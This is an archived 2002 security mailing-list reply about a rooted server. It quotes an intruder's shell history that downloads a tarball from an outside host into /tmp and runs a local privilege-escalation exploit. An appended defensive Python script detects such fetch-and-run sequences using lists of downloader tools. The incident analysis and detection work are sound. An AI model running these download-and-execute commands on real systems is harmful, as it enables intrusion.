Security Incidents mailing list archives
Re: Rooted, .haos on system
From: Carlos Eduardo Pedroza Santiviago <segfault () brturbo com>
Date: Mon, 16 Dec 2002 18:31:03 -0200
On Mon, 16 Dec 2002 13:47:28 -0500 Damian Gerow <damian () sentex net> wrote:
> On Mon, 2002-12-16 at 12:38, Damian Gerow wrote:
>> On Thu, 2002-12-12 at 18:50, Damian Gerow wrote:
>>> I've just received word that one of our customers was rooted, and he's asking about the file ".haos". Nothing rings any bells, has anyone heard of it?
>>
>> Just a quick update to this...
>
> And one last tidbit... Left in the .bash_history was this:
>
>     w
>     cd /tmp
>     wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
>     ./epc
>
> A quick check tells me that 'epc' is a backdoor utility, and the other file contained within loc.tgz looks like a trojaned 'su'.

No, for me this looks like:

epc -> ptrace local exploit
su -> su local exploit

They're old shit, and I guess your system wasn't updated.

> I've already notified Geocities abuse, and haven't heard back from them yet.

Good luck,
--
Carlos Eduardo Pedroza Santiviago -- <segfault@*NO_SPAM*brturbo.com>
Key id/fp = 4B5EB579/A817 71A3 AA78 1997 65DA 0665 A341 D4A4 4B5E B579
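
The .bash_history excerpt quoted in this message shows a fetch, unpack and run chain carried out from /tmp. The following triage sketch is an added example, not part of any poster's message; the directory list, tool sets, tag names and the default home directory are assumptions chosen for illustration.

```python
import posixpath
import re
import shlex

WORLD_WRITABLE = ("/tmp", "/var/tmp", "/dev/shm")   # assumed staging dirs
FETCHERS = {"wget", "curl", "fetch", "lynx", "ftp"}
UNPACKERS = {"tar", "unzip", "gunzip", "bunzip2"}

def in_world_writable(path):
    return any(path == d or path.startswith(d + "/") for d in WORLD_WRITABLE)

def triage_history(lines, home="/root"):
    """Return (line_no, tag, command) for fetch/unpack/run steps that
    happen in, or point into, a world-writable directory."""
    cwd, staged, findings = home, False, []
    for no, line in enumerate(lines, 1):
        # One history line may hold several commands joined by ; && ||
        for cmd in (c.strip() for c in re.split(r";|&&|\|\|", line)):
            try:
                argv = shlex.split(cmd)
            except ValueError:  # unbalanced quotes: fall back to whitespace
                argv = cmd.split()
            if not argv:
                continue
            prog = argv[0]
            if prog == "cd":    # track the working directory across lines
                target = argv[1] if len(argv) > 1 else home
                cwd = posixpath.normpath(posixpath.join(cwd, target))
                continue
            name = posixpath.basename(prog)
            if name in FETCHERS and in_world_writable(cwd):
                findings.append((no, "download", cmd))
                staged = True
            elif name in UNPACKERS and in_world_writable(cwd):
                findings.append((no, "unpack", cmd))
                staged = True
            elif "/" in prog:
                # Explicit path: resolve it against the tracked directory
                full = posixpath.normpath(posixpath.join(cwd, prog))
                if in_world_writable(full):
                    tag = "exec-after-fetch" if staged else "exec"
                    findings.append((no, tag, cmd))
    return findings

# The four history lines quoted in the message above.
SAMPLE = ["w", "cd /tmp",
          "wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz", "./epc"]

if __name__ == "__main__":
    print(*triage_history(SAMPLE), sep="\n")
```

Shell history is attacker-editable and does not expand `~` or `cd -` here, so treat a hit as a lead to confirm against file timestamps and process accounting rather than as proof.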